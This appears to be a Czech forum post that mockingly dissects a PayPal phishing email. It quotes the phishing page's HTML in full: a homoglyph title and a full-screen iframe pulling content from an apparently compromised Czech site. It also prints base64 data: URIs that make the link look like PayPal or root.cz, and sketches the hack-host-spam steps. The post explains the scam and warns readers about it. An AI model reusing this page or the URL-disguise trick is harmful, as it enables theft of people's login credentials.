Citace

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>

<meta http-equiv="content-type" content="text/html; charset=UTF-8" />

<title>Log in | ΡαyΡαl account...</title>

<meta http-equiv="X-UA-Compatible" content="IE=Edge" />

<link rel="shortcut icon" type="image/x-icon" href="view-source:https://goalltrip.com/ccav/NON_SEAMLESS_KIT/sign in/mmp/webapps/auth/images/favicon.ico">

<meta name="GENERATOR" content="MSHTML 8.00.7601.17514">

</head>

<body>

<iframe src="http://www.smaltovane-nadobi-sfinx.cz/obr/uage/ " scrolling="no" id="src_1542861112" frameborder="0" height="1000px" width="100%"></iframe>

<style type="text/css">

#src_1542861112 {

position:absolute;

top:0;

left:0;

}

</style>

</body>

</html>



Ahoj,možná že někteří z Vás jsou úplní idioti, proto bude fajn, když se dozvíte, jak vypadá hax.A) Je potřeba najít nějakou stránku, která se dá snadno hacknout.Třeba tohle bude dobrý terč:B) Naprdět tam nějaké svinstvo:Tož šup s ním do adresáře pro obrázky.Složka se bude jmenovat třeba UAGE[DIR] uage/Schválně si zkuste, kam se prokliknete.Pak rozešlete spam: ( service.limited.account.ppl@host.viglob.com A když bude vypadat dostatečně důvěryhodně, tak se lidi chytnou, já se chytit.No a odkaz v prohlížeči vypadá takhle (Všimněte si toho PAYPAL):data:text/html;returnUri=;base64,PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMDEgVHJhbnNpdGlvbmFsLy9FTiI+DQo8aHRtbD4NCjxoZWFkPg0KCTxtZXRhIGh0dHAtZXF1aXY9ImNvbnRlbnQtdHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PVVURi04IiAvPg0KCTx0aXRsZT5Mb2cgaW4gfCAmIzkyOTsmIzk0NTt5JiM5Mjk7JiM5NDU7bCBhY2NvdW50Li4uPC90aXRsZT4NCgk8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UiIC8+DQoJPGxpbmsgcmVsPSJzaG9ydGN1dCBpY29uIiB0eXBlPSJpbWFnZS94LWljb24iIGhyZWY9InZpZXctc291cmNlOmh0dHBzOi8vZ29hbGx0cmlwLmNvbS9jY2F2L05PTl9TRUFNTEVTU19LSVQvc2lnbiBpbi9tbXAvd2ViYXBwcy9hdXRoL2ltYWdlcy9mYXZpY29uLmljbyI+DQogIDxtZXRhIG5hbWU9IkdFTkVSQVRPUiIgY29udGVudD0iTVNIVE1MIDguMDAuNzYwMS4xNzUxNCI+DQo8L2hlYWQ+DQo8Ym9keT4NCjxpZnJhbWUgc3JjPSJodHRwOi8vd3d3LnNtYWx0b3ZhbmUtbmFkb2JpLXNmaW54LmN6L29ici91YWdlLyAgIiBzY3JvbGxpbmc9Im5vIiBpZD0ic3JjXzE1NDI4NjExMTIiIGZyYW1lYm9yZGVyPSIwIiBoZWlnaHQ9IjEwMDBweCIgd2lkdGg9IjEwMCUiPjwvaWZyYW1lPg0KPHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCiNzcmNfMTU0Mjg2MTExMiB7DQogIHBvc2l0aW9uOmFic29sdXRlOw0KICB0b3A6MDsNCiAgbGVmdDowOw0KfQ0KPC9zdHlsZT4NCjwvYm9keT4NCjwvaHRtbD4=Koukám, koukám, hele, co to jéééé?No je to z Paypalu...člověk nestuduje všechno...né, prostě to je z PayPaluTakhle vypadá zdrojový kód.Tím, že v tom názvu odkazu je napsáno PayPal, tak mi to přišlo důvěryhodné :-DAle dá se tam napsat i www.root.cz :-D lolík nedata:text/html; https://www.root.cz/signin?returnUri=;base64,PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMDEgVHJhbnNpdGlvbmFsLy9FTiI+DQo8aHRtbD4NCjxoZWFkPg0KCTxtZXRhIGh0dHAtZXF1aXY9ImNvbnRlbnQtdHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PVVURi04IiAvPg0KCTx0aXRsZT5Mb2cgaW4gfCAmIzkyOTsmIzk0NTt5JiM5Mjk7JiM5NDU7bCBhY2NvdW50Li4uPC90aXRsZT4NCgk8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UiIC8+DQoJPGxpbmsgcmVsPSJzaG9ydGN1dCBpY29uIiB0eXBlPSJpbWFnZS94LWljb24iIGhyZWY9InZpZXctc291cmNlOmh0dHBzOi8vZ29hbGx0cmlwLmNvbS9jY2F2L05PTl9TRUFNTEVTU19LSVQvc2lnbiBpbi9tbXAvd2ViYXBwcy9hdXRoL2ltYWdlcy9mYXZpY29uLmljbyI+DQogIDxtZXRhIG5hbWU9IkdFTkVSQVRPUiIgY29udGVudD0iTVNIVE1MIDguMDAuNzYwMS4xNzUxNCI+DQo8L2hlYWQ+DQo8Ym9keT4NCjxpZnJhbWUgc3JjPSJodHRwOi8vd3d3LnNtYWx0b3ZhbmUtbmFkb2JpLXNmaW54LmN6L29ici91YWdlLyAgIiBzY3JvbGxpbmc9Im5vIiBpZD0ic3JjXzE1NDI4NjExMTIiIGZyYW1lYm9yZGVyPSIwIiBoZWlnaHQ9IjEwMDBweCIgd2lkdGg9IjEwMCUiPjwvaWZyYW1lPg0KPHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCiNzcmNfMTU0Mjg2MTExMiB7DQogIHBvc2l0aW9uOmFic29sdXRlOw0KICB0b3A6MDsNCiAgbGVmdDowOw0KfQ0KPC9zdHlsZT4NCjwvYm9keT4NCjwvaHRtbD4=